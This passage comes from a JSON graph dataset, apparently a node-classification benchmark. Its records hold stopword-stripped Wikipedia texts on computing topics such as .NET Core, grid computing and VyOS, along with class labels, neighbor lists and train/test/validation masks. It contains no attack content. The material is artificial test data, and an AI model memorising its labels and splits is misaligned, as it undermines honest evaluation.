      5523,
      9622,
      407,
      409,
      1952,
      10658,
      9126,
      936,
      10669,
      7086,
      1967,
      2480,
      7598,
      10675,
      1461,
      1463,
      7607,
      4030,
      9665,
      453,
      3014,
      1480,
      466,
      2008,
      1499,
      1502,
      7134,
      5090,
      995,
      7653,
      7142,
      2536,
      9707,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 5949,
    "label": 3,
    "text": "Ampere_(microarchitecture):ampere microarchitecture ampere codename graphics processing unit gpu microarchitecture developed nvidia successor turing architecture scheduled release 2020 named french mathematician physicist andré-marie ampère june 2019 samsung electronics announced awarded contract produce ampere 7nm euv finfet process replacing tsmc nvidia partner",
    "neighbors": [
      10658,
      2277,
      7111
    ],
    "mask": "None"
  },
  {
    "node_id": 5950,
    "label": 4,
    "text": "Hiya_(company):hiya company hiya seattle-based company provides caller profile information help consumers identify incoming calls block unwanted ones hiya originally developed caller-id app whitepages largest database contact information americans april 2016 hiya spun whitepages april 2016 hiya app 25 million downloads whitepages founder alex algard stepped parent company focus leading hiya april 2016 employs 40 february 2016 hiya time part whitepages reached deal samsung integrate caller profile spam protection services galaxy s7 galaxy s7 edge phones 16 countries.the company extended partnership samsung separate deal august 2016 include service galaxy note 7 expand partnership total 28 countries august 2016 hiya launched hiya cloud network level caller id call-blocking offering offering limited version app iphones hiya announced september 2016 full version app would available ios 10 soon hiya began providing spam protection services phones call protect product 2017 hiya entered similar partnership zte provide call spam protection services axon 7 users october 2017 hiya announced received first outside funding series 18 million led balderton capital participation nautilus venture partners lumia capital hiya said would use funds expand globally following investment balderton ’ lars fjeldsoe-nielsen early executive uber dropbox joined hiya ’ board hiya database 1.5 billion phone numbers draws identify source incoming calls helps users make decision whether want pick call unknown number service automatically block calls numbers deemed associated fraud notifies user blocked call cases app let call go notify user number suspected spam users report numbers associated unwanted calls app well block future calls certain phone numbers",
    "neighbors": [
      4623
    ],
    "mask": "Test"
  },
  {
    "node_id": 5951,
    "label": 7,
    "text": "Monitoring_as_a_service:monitoring service monitoring service maas one many cloud computing delivery models anything service xaas framework facilitates deployment monitoring functionalities various services applications within cloud common application maas online state monitoring continuously tracks certain states applications networks systems instances element may deployable within cloud",
    "neighbors": [
      4194
    ],
    "mask": "None"
  },
  {
    "node_id": 5952,
    "label": 2,
    "text": ".NET_Core:.net core .net core free open-source managed computer software framework windows linux macos operating systems open source cross platform successor .net framework project primarily developed microsoft released mit license 1.0 announced november 12 2014 released june 27 2016 along microsoft visual studio 2015 update 3 enables .net core development 1.0.4 .net core 1.1.1 released along .net core tools 1.0 visual studio 2017 march 7 2017 .net core 2.0 released august 14 2017 along visual studio 2017 15.3 asp.net core 2.0 entity framework core 2.0 2.1 released may 30 2018 .net core 2.2 released december 4 2018 .net core 3 announced may 7 2019 microsoft build currently preview builds available official release planned september 2019 .net core 3 framework get support development desktop application software artificial intelligence/machine learning iot apps next release .net core 3.0 .net 5 .net framework deprecated .net 5 .net going forwardhence removal core branding skipping version 4 avoid confusion .net framework 4.x .net core fully supports c f partially supports visual basic .net currently vb.net compiles runs .net core separate visual basic runtime implemented microsoft announced .net core 3 would include visual basic runtime c++/cli yet supported although support planned windows supports four cross-platform scenarios asp.net core web apps command-line apps libraries universal windows platform apps prior .net core 3.0 implement windows forms windows presentation foundation wpf render standard gui desktop software windows however .net core 3 supports desktop technologies winforms wpf universal windows platform uwp supports use nuget packages unlike .net framework serviced using windows update relies package manager receive updates similar .net framework implements common language infrastructure cli via common language runtime clr framework class library fcl two main components coreclr corefx respectively cli implementation virtual execution system ves coreclr complete runtime virtual machine managed execution programs includes just-in-time compiler called ryujit also contains corert runtime optimized integrated aot compiled native binaries cli implementation foundational standard libraries corefx shares subset apis however also comes apis part variant library used uwp command-line interface offers execution entry point operating systems provides developer services like compilation package management",
    "neighbors": [
      10243,
      2063,
      10769,
      1043,
      1055,
      2083,
      8227,
      1577,
      2603,
      4143,
      9263,
      11316,
      1077,
      8246,
      4174,
      4178,
      9813,
      603,
      2145,
      1656,
      3705,
      9340,
      5761,
      5765,
      10886,
      2183,
      5259,
      653,
      6797,
      10388,
      3224,
      3736,
      4771,
      7846,
      10414,
      8391,
      214,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      1770,
      11498,
      3821,
      10991,
      2804,
      4853,
      6411,
      6927,
      9491,
      5401,
      4384,
      2854,
      11559,
      10024,
      3881,
      10026,
      7983,
      11570,
      823,
      1856,
      833,
      1348,
      844,
      3413,
      10079,
      11616,
      2401,
      11617,
      2943,
      9609,
      9612,
      9114,
      10654,
      8607,
      8609,
      11683,
      6584,
      10684,
      2493,
      5067,
      11212,
      7629,
      11221,
      8161,
      6114,
      5612,
      9196,
      4590,
      3569,
      3573,
      10229,
      5119
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5953,
    "label": 1,
    "text": "Transaction_log:transaction log field databases computer science transaction log also transaction journal database log binary log audit trail history actions executed database management system used guarantee acid properties crashes hardware failures physically log file listing changes database stored stable storage format start database found inconsistent state shut properly database management system reviews database logs uncommitted transactions rolls back changes made transactions additionally transactions already committed whose changes yet materialized database re-applied done ensure atomicity durability transactions term confused human-readable logs database management system usually provides database management systems journal record data altered given process database log record made log records include general log attributes also attributes depending type recorded type attribute",
    "neighbors": [
      2432,
      10632,
      8201,
      10505,
      3219,
      2068,
      8979,
      7446,
      10389,
      3096,
      2456,
      1049,
      5403,
      5658,
      9112,
      10137,
      4255,
      9248,
      9631,
      9634,
      1447,
      2344,
      4263,
      7080,
      10793,
      10921,
      10413,
      10286,
      7347,
      9397,
      3004,
      1341,
      7868,
      11324,
      10048,
      2369,
      5953,
      6850,
      8261,
      2246,
      9286,
      2632,
      11030,
      9290,
      8788,
      2901,
      10069,
      7767,
      10326,
      987,
      2780,
      8539,
      734,
      4065,
      7523,
      9828,
      10340,
      10471,
      8808,
      6124,
      2669,
      6383,
      2544,
      10737,
      9075,
      7412,
      9335,
      1146,
      3196
    ],
    "mask": "None"
  },
  {
    "node_id": 5954,
    "label": 1,
    "text": "Universal_IR_Evaluation:universal ir evaluation computer science universal ir evaluation information retrieval evaluation aims develop measures database retrieval performance shall comparable across information retrieval tasks ir information retrieval evaluation begins whenever user submits query search term database user able determine relevance document database relevant relevant query complete set documents naturally divided four distinct mutually exclusive subsets relevant documents retrieved relevant documents retrieved relevant documents retrieved relevant documents retrieved four subsets documents denoted letters b c respectively called swets variables named inventor addition swets definitions four relevance metrics also defined precision refers fraction relevant documents retrieved a/ a+b recall refers fraction retrieved documents relevant a/ a+c commonly used well-known relevance metrics found ir evaluation literature two less commonly used metrics include fallout i.e. fraction relevant documents retrieved b/ b+d miss refers fraction relevant documents retrieved c/ c+d given search universal ir evaluation addresses mathematical possibilities relationships among four relevance metrics precision recall fallout miss denoted p r f respectively one aspect problem involves finding mathematical derivation complete set universal ir evaluation points complete set 16 points one quadruple form p r f describes possible universal ir outcomes example many us experience querying database retrieving documents case precision would take undetermined form 0/0 recall fallout would zero miss would value greater zero less one assuming mix relevant relevant documents database none retrieved universal ir evaluation point would thus denoted 0/0 0 0 represents one 16 possible universal ir outcomes mathematics universal ir evaluation fairly new subject since relevance metrics p r f analyzed collectively recently within past decade lot theoretical groundwork already formulated new insights area await discovery detailed mathematical analysis query sciencedirect database universal ir evaluation retrieves several relevant peer-reviewed papers",
    "neighbors": [
      2901
    ],
    "mask": "Train"
  },
  {
    "node_id": 5955,
    "label": 7,
    "text": "BaseN:basen basen global full stack internet things iot operator headquartered helsinki finland basen established 2001 provide extremely scalable fault-tolerant network service management systems telecom operators large multinational enterprises basen develops markets software service saas suite basen platform public private infrastructures basen platform built redundant computing grid due basen linearly scalable flexible resilient components grid work together function separately automatically take roles grid architecture also allows quick deployment individual components functional immediately installation spimes record manage full lifecycle physical representations physical hardware support software come go object considered spime essential programming managed cloud spime concept originally crafted author bruce sterling neologism futuristic internet things object basen founded 2001 pasi hurri president ceo basen holds following us patents technology us20170139788a1 us 20120158328 us 20120089523 us 20120158327 us 20120154171 us 20120158329 basen developed system telecom networks basen one founders fennogrid association whose purpose sharing information grid peer-to-peer research promotion cooperation projects fields basen also member international e-science consortium enabling grids e-science 2015 tm forum awarded basen partners innovative catalyst digital health 2013 basen awarded two industry awards tm forum one innovative catalyst smart grid empowering digital customer one significant contribution frameworx ehealth – curing complexity",
    "neighbors": [
      467,
      5956,
      8589
    ],
    "mask": "Test"
  },
  {
    "node_id": 5956,
    "label": 7,
    "text": "Grid_computing:grid computing grid computing use widely distributed computer resources reach common goal computing grid thought distributed system non-interactive workloads involve large number files grid computing distinguished conventional high-performance computing systems cluster computing grid computers node set perform different task/application grid computers also tend heterogeneous geographically dispersed thus physically coupled cluster computers although single grid dedicated particular application commonly grid used variety purposes grids often constructed general-purpose grid middleware software libraries grid sizes quite large grids form distributed computing whereby super virtual computer composed many networked loosely coupled computers acting together perform large tasks certain applications distributed grid computing seen special type parallel computing relies complete computers onboard cpus storage power supplies network interfaces etc connected computer network private public conventional network interface ethernet contrast traditional notion supercomputer many processors connected local high-speed computer bus grid computing combines computers multiple administrative domains reach common goal solve single task may disappear quickly size grid may vary small—confined network computer workstations within corporation example—to large public collaborations across many companies networks notion confined grid may also known intra-nodes cooperation whereas notion larger wider grid may thus refer inter-nodes cooperation grids form distributed computing whereby “ super virtual computer ” composed many networked loosely coupled computers acting together perform large tasks technology applied computationally intensive scientific mathematical academic problems volunteer computing used commercial enterprises diverse applications drug discovery economic forecasting seismic analysis back office data processing support e-commerce web services coordinating applications grids complex task especially coordinating flow information across distributed computing resources grid workflow systems developed specialized form workflow management system designed specifically compose execute series computational data manipulation steps workflow grid context “ distributed ” “ grid ” computing general special type parallel computing relies complete computers onboard cpus storage power supplies network interfaces etc connected network private public internet conventional network interface producing commodity hardware compared lower efficiency designing constructing small number custom supercomputers primary performance disadvantage various processors local storage areas high-speed connections arrangement thus well-suited applications multiple parallel computations take place independently without need communicate intermediate results processors high-end scalability geographically dispersed grids generally favorable due low need connectivity nodes relative capacity public internet also differences programming mc costly difficult write programs run environment supercomputer may custom operating system require program address concurrency issues problem adequately parallelized “ thin ” layer “ grid ” infrastructure allow conventional standalone programs given different part problem run multiple machines makes possible write debug single conventional machine eliminates complications due multiple instances program running shared memory storage space time one feature distributed grids formed computing resources belonging one multiple individuals organizations known multiple administrative domains facilitate commercial transactions utility computing make easier assemble volunteer computing networks one disadvantage feature computers actually performing calculations might entirely trustworthy designers system must thus introduce measures prevent malfunctions malicious participants producing false misleading erroneous results using system attack vector often involves assigning work randomly different nodes presumably different owners checking least two different nodes report answer given work unit discrepancies would identify malfunctioning malicious nodes however due lack central control hardware way guarantee nodes drop network random times nodes like laptops dial-up internet customers may also available computation network communications unpredictable periods variations accommodated assigning large work units thus reducing need continuous network connectivity reassigning work units given node fails report results expected time another set could termed social compatibility issues early days grid computing related goals grid developers carry innovation beyond original field high-performance computing across disciplinary boundaries new fields like high-energy physics impacts trust availability performance development difficulty influence choice whether deploy onto dedicated cluster idle machines internal developing organization open external network volunteers contractors many cases participating nodes must trust central system abuse access granted interfering operation programs mangling stored information transmitting private data creating new security holes systems employ measures reduce amount trust “ client ” nodes must place central system placing applications virtual machines public systems crossing administrative domains including different departments organization often result need run heterogeneous systems using different operating systems hardware architectures many languages trade-off investment software development number platforms supported thus size resulting network cross-platform languages reduce need make tradeoff though potentially expense high performance given node due run-time interpretation lack optimization particular platform various middleware projects created generic infrastructure allow diverse scientific commercial projects harness particular associated grid purpose setting new grids boinc common one various academic projects seeking public volunteers listed end article fact middleware seen layer hardware software top middleware number technical areas considered may may middleware independent example areas include sla management trust security virtual organization management license management portals data management technical areas may taken care commercial solution though cutting edge area often found within specific research projects examining field segmentation grid computing market two perspectives need considered provider side user side overall grid market comprises several specific markets grid middleware market market grid-enabled applications utility computing market software-as-a-service saas market grid middleware specific software product enables sharing heterogeneous resources virtual organizations installed integrated existing infrastructure involved company companies provides special layer placed among heterogeneous infrastructure specific user applications major grid middlewares globus toolkit glite unicore utility computing referred provision grid computing applications service either open grid utility hosting solution one organization vo major players utility computing market sun microsystems ibm hp grid-enabled applications specific software applications utilize grid infrastructure made possible use grid middleware pointed software service saas “ software owned delivered managed remotely one providers. ” gartner 2007 additionally saas applications based single set common code data definitions consumed one-to-many model saas uses pay go payg model subscription model based usage providers saas necessarily computing resources required run saas therefore saas providers may draw upon utility computing market utility computing market provides computing resources saas providers companies demand user side grid computing market different segments significant implications deployment strategy deployment strategy well type investments made relevant aspects potential grid users play important role grid adoption cpu-scavenging cycle-scavenging shared computing creates “ grid ” idle resources network participants whether worldwide internal organization typically technique exploits 'spare instruction cycles resulting intermittent inactivity typically occurs night lunch breaks even comparably miniscule though numerous moments idle waiting modern desktop cpu experience throughout day computer waiting io user network storage practice participating computers also donate supporting amount disk storage space ram network bandwidth addition raw cpu power many volunteer computing projects boinc use cpu scavenging model since nodes likely go offline time time owners use resources primary purpose model must designed handle contingencies creating opportunistic environment another implementation cpu-scavenging special workload management system harvests idle desktop computers compute-intensive jobs also refers enterprise desktop grid edg instance htcondor open-source high-throughput computing software framework coarse-grained distributed rationalization computationally intensive tasks configured use desktop machines keyboard mouse idle effectively harness wasted cpu power otherwise idle desktop workstations like full-featured batch systems htcondor provides job queueing mechanism scheduling policy priority scheme resource monitoring resource management used manage workload dedicated cluster computers well seamlessly integrate dedicated resources rack-mounted clusters non-dedicated desktop machines cycle scavenging one computing environment term grid computing originated early 1990s metaphor making computer power easy access electric power grid power grid metaphor accessible computing quickly became canonical ian foster carl kesselman published seminal work grid blueprint new computing infrastructure 1999 preceded decades metaphor utility computing 1961 computing public utility analogous phone system cpu scavenging volunteer computing popularized beginning 1997 distributed.net later 1999 seti home harness power networked pcs worldwide order solve cpu-intensive research problems ideas grid including distributed computing object-oriented programming web services brought together ian foster steve tuecke university chicago carl kesselman university southern california information sciences institute trio led effort create globus toolkit widely regarded fathers grid toolkit incorporates computation management also storage management security provisioning data movement monitoring toolkit developing additional services based infrastructure including agreement negotiation notification mechanisms trigger services information aggregation globus toolkit remains de facto standard building grid solutions number tools built answer subset services needed create enterprise global grid 2007 term cloud computing came popularity conceptually similar canonical foster definition grid computing terms computing resources consumed electricity power grid earlier utility computing indeed grid computing often always associated delivery cloud computing systems exemplified applogic system 3tera november 2006 seidel received sidney fernbach award supercomputing conference tampa florida outstanding contributions development software hpc grid computing enable collaborative numerical investigation complex problems physics particular modeling black hole collisions award one highest honors computing awarded achievements numerical relativity also march 2019 bitcoin network measured computing power equivalent 80,000,000 pflops floating-point operations per second measurement reflects number flops required equal hash output bitcoin network rather capacity general floating-point arithmetic operations since elements bitcoin network perform specific cryptographic hash computation required bitcoin protocol grid computing offers way solve grand challenge problems protein folding financial modeling earthquake simulation climate/weather modeling grids offer way using information technology resources optimally inside organization also provide means offering information technology utility commercial noncommercial clients clients paying use electricity water october 2016 4 million machines running open-source berkeley open infrastructure network computing boinc platform members world community grid one projects using boinc seti home using 400,000 computers achieve 0.828 tflops october 2016 october 2016 folding home part boinc achieved 101 x86-equivalent petaflops 110,000 machines european union funded projects framework programmes european commission beingrid business experiments grid research project funded european commission integrated project sixth framework programme fp6 sponsorship program started june 1 2006 project ran 42 months november 2009 project coordinated atos origin according project fact sheet mission “ establish effective routes foster adoption grid computing across eu stimulate research innovative business models using grid technologies ” extract best practice common themes experimental implementations two groups consultants analyzing series pilots one technical one business project significant long duration also budget 24.8 million euros largest fp6 integrated project 15.7 million provided european commission remainder 98 contributing partner companies since end project results beingrid taken carried forward it-tude.com enabling grids e-science project based european union included sites asia united states follow-up project european datagrid edg evolved european grid infrastructure along lhc computing grid lcg developed support experiments using cern large hadron collider list active sites participating within lcg found online real time monitoring egee infrastructure relevant software documentation also publicly accessible speculation dedicated fiber optic links installed cern address lcg data-intensive needs may one day available home users thereby providing internet services speeds 10,000 times faster traditional broadband connection european grid infrastructure also used research activities experiments simulation oncological clinical trials distributed.net project started 1997 nasa advanced supercomputing facility nas ran genetic algorithms using condor cycle scavenger running 350 sun microsystems sgi workstations 2001 united devices operated united devices cancer research project based grid mp product cycle-scavenges volunteer pcs connected internet project ran 3.1 million machines close 2007 today many definitions grid computing",
    "neighbors": [
      10247,
      3083,
      526,
      2064,
      531,
      7699,
      5654,
      6184,
      7218,
      2555,
      1087,
      2113,
      1607,
      9301,
      3158,
      8792,
      11353,
      2651,
      2140,
      11359,
      4194,
      4195,
      10340,
      5223,
      105,
      8810,
      4205,
      11377,
      6774,
      7802,
      6268,
      3197,
      7294,
      11393,
      5767,
      7303,
      4233,
      5258,
      9867,
      5772,
      7313,
      9876,
      2710,
      7318,
      8349,
      158,
      6815,
      160,
      1185,
      2210,
      5283,
      5798,
      4286,
      4799,
      1731,
      8901,
      198,
      6856,
      4809,
      7882,
      9932,
      4817,
      3282,
      4308,
      2264,
      731,
      11487,
      8420,
      10469,
      8187,
      6381,
      9455,
      247,
      249,
      3323,
      6909,
      7935,
      8447,
      9984,
      3331,
      5384,
      3849,
      1806,
      785,
      11027,
      6421,
      7446,
      7963,
      10020,
      7461,
      4390,
      5414,
      2345,
      4909,
      3379,
      8501,
      2358,
      7482,
      5948,
      8514,
      5955,
      5956,
      10051,
      1862,
      3398,
      4423,
      7497,
      330,
      1866,
      8523,
      9040,
      344,
      2394,
      8030,
      11618,
      10597,
      7018,
      9069,
      10102,
      3449,
      9602,
      11658,
      5518,
      404,
      11156,
      3993,
      6042,
      2459,
      7581,
      6564,
      9126,
      1449,
      2990,
      10675,
      4020,
      437,
      8122,
      8640,
      9665,
      1480,
      467,
      4052,
      2008,
      10200,
      10721,
      5090,
      7142,
      2536,
      5612,
      6639,
      7664,
      499,
      4091,
      508,
      8702
    ],
    "mask": "Test"
  },
  {
    "node_id": 5957,
    "label": 1,
    "text": "Leuven_Database_of_Ancient_Books:leuven database ancient books leuven database ancient books ldab resource ancient written literary manuscripts 500 bc ad 800 currently lists 16.000 greek latin coptic syriac demotic literary texts attempts collect basic information ancient literary texts includes authors homer gregory great 3.600 texts unidentified authors founded 1998 ku leuven willy clarysse",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 5958,
    "label": 7,
    "text": "Brownout_(software_engineering):brownout software engineering brownout software engineering technique increase robustness application computing capacity shortage many users simultaneously accessing application hosted online underlying computing infrastructure may become overloaded rendering application unresponsive users likely abandon application switch competing alternatives hence incurring long-term revenue loss better deal situation application given brownout capabilities application disable certain features – e.g. online shop longer display recommendations related products – avoid overload although reducing features generally negative impact short-term revenue application owner long-term revenue loss avoided technique inspired brownouts power grids consists reducing power grid voltage case electricity demand exceeds production consumers incandescent light bulbs dim – hence originating term – draw less power thus helping match demand production similarly brownout application helps match computing capacity requirements available target infrastructure brownout complements elasticity former help application withstand short-term capacity shortage without changing capacity available application contrast elasticity consists adding removing capacity application preferably advance avoid capacity shortage altogether two techniques combined e.g. brownout triggered number users increases unexpectedly elasticity triggered latter usually requiring minutes show effect brownout relatively non-intrusive developer example implemented advice aspect-oriented programming however surrounding components load-balancers need made brownout-aware distinguish cases application running normally cases application maintains low response time triggering brownout",
    "neighbors": [
      3993,
      3725
    ],
    "mask": "Test"
  },
  {
    "node_id": 5959,
    "label": 4,
    "text": "VyOS:vyos vyos open source network operating system based debian gnu/linux vyos provides free routing platform competes directly commercially available solutions well known network providers vyos run standard amd64 i586 systems able used router firewall platform cloud deployments brocade communications stopped development vyatta core edition vyatta routing software small group enthusiasts took last community edition worked building open source fork live place end life vc vyos version 1.0.0 hydrogen released december 22 2013 october 9 2014 version 1.1.0 helium released versions released thus far based debian 6.0 squeeze available 32-bit images 64-bit images physical virtual machines january 28 2019 version 1.2.0 crux released version 1.2.0 based debian 8 jessie version 1.0 1.1 named elements new naming scheme based constellations used version 1.2 vyos ova image vmware released february 3 2014 maintenance release allows convenient setup vyos vmware platform includes vmware tools paravirtual drivers ova image downloaded standard download site starting version 1.0.2 amazon ec2 customers select vyos ami image deprecated removed february 2018 starting version 1.1.7 aws customers use new marketplace vyos ami starting version 1.2.0 aws customers deploy new marketplace ami new offering comes support starting version 1.2.0 azure customers use vyos azure",
    "neighbors": [
      4611,
      8211,
      9764,
      9253,
      11305,
      56,
      59,
      9279,
      10303,
      4673,
      8265,
      1110,
      2136,
      4194,
      3685,
      9318,
      10860,
      2671,
      5749,
      11388,
      8837,
      10394,
      3742,
      673,
      3745,
      4268,
      686,
      7854,
      10417,
      2738,
      7859,
      2228,
      4790,
      3777,
      10433,
      9927,
      5322,
      8907,
      11468,
      7887,
      7376,
      10451,
      1754,
      6364,
      4841,
      6890,
      7913,
      7920,
      5363,
      9461,
      6393,
      3322,
      8957,
      2825,
      7435,
      2321,
      5397,
      1814,
      4887,
      10530,
      3885,
      7983,
      7483,
      3903,
      2884,
      2375,
      11086,
      4435,
      9048,
      5978,
      2914,
      8039,
      9064,
      7020,
      7534,
      9074,
      10127,
      11162,
      1436,
      10149,
      7082,
      439,
      3007,
      4039,
      5084,
      9693,
      10210,
      485,
      11248,
      8177,
      9722
    ],
    "mask": "Test"
  },
  {
    "node_id": 5960,
    "label": 1,
    "text": "Amazon_Redshift:amazon redshift amazon redshift internet hosting service data warehouse product forms part larger cloud-computing platform amazon web services built top technology massive parallel processing mpp data warehouse company paraccel later acquired actian handle large scale data sets database migrations redshift differs amazon hosted database offering amazon rds ability handle analytic workloads big data data sets stored column-oriented dbms principle amazon redshift based older version postgresql 8.0.2 redshift made changes version initial preview beta released november 2012 full release made available february 15 2013 service handle connections applications using odbc jdbc connections according cloud data warehouse report published forrester q4 2018 amazon redshift largest cloud data warehouse deployments 6,500 deployments 2018 redshift came second industry wide benchmark test run gigaom behind microsoft azure amazon listed number business intelligence software proprietors partners tested tools apn partner program including actian actuate corporation alteryx dundas data visualization ibm cognos inetsoft infor logi analytics looker company microstrategy pentaho qlik sisense tableau software yellowfin partner companies providing data integration tools include informatica snaplogic system integration consulting partners include accenture deloitte capgemini dxc technology",
    "neighbors": [
      11392,
      8962,
      3,
      8451,
      6027,
      1935,
      10134,
      1816,
      5660,
      11038,
      6943,
      10912,
      11556,
      2217,
      7983,
      10681,
      11201,
      10185,
      6348,
      590,
      7248,
      2901,
      7767,
      7512,
      4696,
      8921,
      8539,
      9177,
      735,
      4194,
      1001,
      5612,
      10735,
      8434,
      8181
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5961,
    "label": 9,
    "text": "Comparison_of_programming_languages_(object-oriented_programming):comparison programming languages object-oriented programming comparison programming languages compares object-oriented programming languages c++ java smalltalk object pascal perl python others manipulate data structures declare property named bar access members object x",
    "neighbors": [
      2304,
      10752,
      3462,
      8582,
      1931,
      4747,
      6414,
      10510,
      6160,
      5521,
      3736,
      155,
      9245,
      5796,
      5165,
      5677,
      5679,
      5806,
      9008,
      3765,
      7479,
      10043,
      10684,
      6335,
      963,
      8644,
      1610,
      1611,
      9804,
      3577,
      8397,
      11212,
      7292,
      11219,
      5588,
      3414,
      7894,
      4057,
      10586,
      11610,
      4069,
      10470,
      7274,
      8554,
      8303,
      6640,
      1016,
      3705,
      2556
    ],
    "mask": "Test"
  },
  {
    "node_id": 5962,
    "label": 2,
    "text": "Scott_James_Remnant:scott james remnant scott james remnant born 18 july 1980 open source software engineer scott served long-time debian developer 2006 worked ubuntu developer manager ubuntu linux distribution canonical ltd works google technical lead bluetooth systems scott openly gay believes important open support others open source community",
    "neighbors": [
      2180,
      11410,
      11669,
      8727,
      4123,
      8476,
      926,
      3245,
      6445,
      8112,
      439,
      9407,
      3654,
      975,
      1107,
      4951,
      3550,
      4192,
      3685,
      5990,
      7913,
      7020,
      9324,
      8177,
      2930,
      7027,
      1396,
      9074,
      9971,
      5369,
      5755,
      3068,
      11263
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5963,
    "label": 3,
    "text": "Devices_using_Qualcomm_Snapdragon_systems-on-chip:devices using qualcomm snapdragon systems-on-chip list devices using qualcomm snapdragon chips snapdragon family mobile system chip soc made qualcomm use smartphones tablets smartbook devices",
    "neighbors": [
      7170,
      8196,
      8720,
      11282,
      9235,
      11289,
      1057,
      6178,
      38,
      4139,
      8237,
      9774,
      8250,
      1083,
      8253,
      10303,
      7745,
      7235,
      7747,
      2635,
      99,
      8812,
      11374,
      10361,
      638,
      644,
      10884,
      9863,
      8842,
      146,
      659,
      1170,
      7833,
      666,
      5786,
      4258,
      4773,
      9913,
      10945,
      9928,
      2258,
      8919,
      2788,
      3301,
      9964,
      6391,
      3835,
      2308,
      781,
      5417,
      3380,
      7988,
      10548,
      11062,
      1849,
      6971,
      10562,
      8003,
      6981,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      11629,
      6001,
      2420,
      373,
      8058,
      392,
      398,
      1428,
      9115,
      5028,
      7077,
      9638,
      424,
      2993,
      3511,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      4569,
      2524,
      9182,
      488,
      10223,
      1014,
      3575
    ],
    "mask": "Test"
  },
  {
    "node_id": 5964,
    "label": 1,
    "text": "SQLyog:sqlyog sqlyog gui tool rdbms mysql developed webyog inc. based bangalore india santa clara california sqlyog used 30,000 customers worldwide downloaded 2,000,000 times sqlyog v0.9 first released public 2001 eight months development sqlyog available free charge closed source code v3.0 made fully commercial software nowadays sqlyog distributed free software well several paid proprietary versions free software version known community edition github paid versions sold professional enterprise ultimate editions prominent features sqlyog sqlyog works windows platform ranging windows vista windows 10 windows 9x/me support removed version 5.0 windows 2000 support stopped version 8.6 windows xp support ended version 12.5 also made work linux various unixes including macos using wine environment subset sqlyog enterprise/ultimate functionalities available free sja sqlyog job agent linux native linux utility makes possible specify test scheduled jobs windows environment port execution parameters seamlessly linux environment webyog provides priority support customers primarily ticket based support system users community edition get support webyog forums 15000 registered users webyog also maintains extensive faq commonly asked questions",
    "neighbors": [
      8195,
      9481,
      6797,
      10258,
      6424,
      7453,
      1950,
      9503,
      5546,
      7339,
      7983,
      9010,
      823,
      4797,
      6721,
      5198,
      7506,
      11221,
      9687,
      9177,
      10459,
      1632,
      6245,
      10341,
      8295,
      8683,
      2413,
      7022,
      3188,
      10873,
      2810
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5965,
    "label": 7,
    "text": "Traversed_edges_per_second:traversed edges per second number traversed edges per second teps performed supercomputer cluster measure communications capabilities computational power machine contrast standard metric floating point operations per second flops give weight communication capabilities machine term first entered usage 2010 advent petascale computing since measured many world largest supercomputers context edge connection two vertices graph traversal ability machine communicate data two points standardized benchmark associated graph500 september 2011 calls executing graph generation search algorithms graphs large 1.1 petabyte ability application utilize supercomputer cluster effectively depends raw speed processor also communication network importance communication capability varies application application clear linpack benchmarks traditionally used rating flops supercomputers require communications capability many scientific applications therefore alternative metrics characterize performance machine holistic manner may relevant many scientific applications may desirable making purchasing decisions",
    "neighbors": [
      1480,
      1933
    ],
    "mask": "Test"
  },
  {
    "node_id": 5966,
    "label": 7,
    "text": "LiveTiles:livetiles livetiles software company founded 2014 offers cloud based intelligent workplace software commercial government education markets 2018 raised 50 million total funding including seed funding company headquartered new york city offices globally including locations seattle tri-cities washington state san francisco los angeles chicago minneapolis north carolina london sligo zurich netherlands sydney melbourne geelong hobart livetiles founded australia 2014 2015 became listed australian securities exchange reverse acquisition coal company modun resources limited initial ipo 57 million ceo company karl redenbach cofounded livetiles peter nguyen-brown 2017 company raised 12 million equity financing share purchase plan may 2018 livetiles acquired us based microsoft ai firm hyperfish 8.9 million february 2019 livetiles acquired danish digital workplace software company wizdom maximum total purchase price eur 30 million approximately 47.6 million company develops sells cloud-based intelligent workplace software office 365 azure sharepoint includes various solutions including livetiles mosaic developed k-12 educational institutions 1.2 million users livetiles commercial also provide livetiles mx mobile app digital workplace design tools called livetiles cloud livetiles sharepoint artificial intelligence platform livetiles intelligence livetiles sap software 2017 livetiles partnered microsoft launch joint venture ai australia australian-based artificial intelligence development firm",
    "neighbors": [
      1935
    ],
    "mask": "None"
  },
  {
    "node_id": 5967,
    "label": 2,
    "text": "Least_frequently_used:least frequently used least frequently used lfu type cache algorithm used manage memory within computer standard characteristics method involve system keeping track number times block referenced memory cache full requires room system purge item lowest reference frequency lfu sometimes combined least recently used algorithm called lrfu simplest method employ lfu algorithm assign counter every block loaded cache time reference made block counter increased one cache reaches capacity new block waiting inserted system search block lowest counter remove cache lfu method may seem like intuitive approach memory management without faults consider item memory referenced repeatedly short period time accessed extended period time due rapidly accessed counter increased drastically even though used decent amount time leaves blocks may actually used frequently susceptible purging simply accessed different method moreover new items entered cache subject removed soon start low counter even though might used frequently due major issues like explicit lfu system fairly uncommon instead hybrids utilize lfu concepts",
    "neighbors": [
      2339,
      2250,
      5840,
      11674,
      5661
    ],
    "mask": "Test"
  },
  {
    "node_id": 5968,
    "label": 9,
    "text": "Winbatch:winbatch winbatch microsoft windows scripting language originally developed wilson windowware currently supported maintained enhanced island lake consulting llc environment includes interpreter code editor along dialog designer optional compiler create self-contained executables language structure syntax cross dos batch command basic fortran c. developed years functions added support things like .net activex controls com ole unicode uac code signing wilson windowware founded 1989 product command post 1991 menuing language command post became winbatch shortly corporate version released included code binder program combines bytecode version program along interpreter july 2017 wilson windowware ceased operation winbatch acquired newly formed island lake consulting llc documentation available german spanish japanese languages winbatch hello world program extenders add additional commands winbatch programming language popular extenders included default winbatch installer additional extenders available download",
    "neighbors": [
      9728,
      1121,
      7364,
      8262,
      10886,
      780,
      6797,
      8588,
      7343,
      7983,
      3218,
      8692,
      9780,
      5622,
      9909
    ],
    "mask": "Test"
  },
  {
    "node_id": 5969,
    "label": 6,
